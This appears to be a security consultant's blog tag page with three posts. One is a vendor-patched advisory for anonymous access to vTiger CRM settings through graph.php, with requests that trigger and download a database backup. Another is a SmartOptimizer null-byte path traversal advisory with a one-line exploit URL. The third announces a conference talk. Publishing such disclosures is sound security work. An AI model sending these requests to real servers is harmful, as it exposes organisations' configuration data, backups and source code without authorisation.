Posts tagged sécurité
Advisory: MEDS-2011-01 – VTigerCRM Anonymous access to Setting Module
0Hi,
Here a old vulnerability submitted to vTiger Team last summer. As the 5.3 release was released some week ago, I can now publish this advisory.
Advisory: MEDS-2011-01 - VTigerCRM Anonymous access to Setting Module using graph.php Release Date: 2011-05-08 Author: Francois Harvey, gestion medsecure (francois.harvey at medsecure dot ca) - http://medsecure.ca Application: Vtiger CRM 5.2.x, 5.1.x Severity: High Risk: High Vendor Status: notified fixed in 5.3 OVERVIEW "vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal for small and medium businesses, with low-cost product support available to production users that need reliable support." VULNERABILITY Some module (Many in Setting, but also Portal) from vtiger CRM don't verify the user access level and may be called in anonymous mode using the graph.php script. This vulnerability can be used to view or modify some configurations setting (organisation name, templates, backup). EXPLOIT # Show Organization information http://x.x.x.x/vtigercrm/graph.php?module=Settings&action=OrganizationConfig&parenttab=Settings # Launching Backup and get the backup file (if enabled) 1) Start a Backup POST /vtigercrm/graph.php server_type=local_backup&module=Settings&action=BackupServerConfig&local_server_mode=&parenttab=Settings&enable_local_backup=on&backupnow=Backup+Now 2) Find the backup name in the output Backed Up Successfully To File : ./backups/Vtiger-dd May 2011 hh_mm_ss GMT.zip 3) Get the Dumpfile GET /vtigercrm/backups/Vtiger-dd May 2011 hh_mm_ss GMT.zip FIX Upgrade to 5.3.x AUTHOR François Harvey - CISM/CISSP/TCSE Professionnel en sécurité de l'information Gestion medsecure medsecure.ca - francoisharvey.ca
[MEDS-2010-5] Injection de NULL dans SmartOptimizer
0Voici un avis de sécurité pour SmartOptimizer 1.7 et précédente. Une vulnérabilité permet des accès à des types de fichiers non autorisées (exemple code source des applications) en utilisant un null byte (%00) pour contourner la vérification des extensions valides. L’exploitation est très simple :
smartoptimizer/index.php?../index.php%00.js
Le développeur de ce logiciel à intégré un correctif, ainsi la version 1.8 corrige cette vulnérabilité et est disponible à l’adresse suivante : http://farhadi.ir/works/smartoptimizer
Conférencier à Confoo
0Yep, j’ai été retenu comme conférencier pour la conférence Confoo – web techno conférence en mars prochain ! W00t ! Le programme a l’air génial et très heureux d’avoir été retenu parmi les 427 propositions qui leurs ont été soumis. Ma session portera sur les processus de gestions d’incidents et comment les intégrés dans les logiciels. Vous pouvez consulter la fiche complète est disponible sur le site de confoo dans la section sessions. Je publierai surement quelques articles sur le sujet ainsi que sur cette conférence au cours des prochains mois.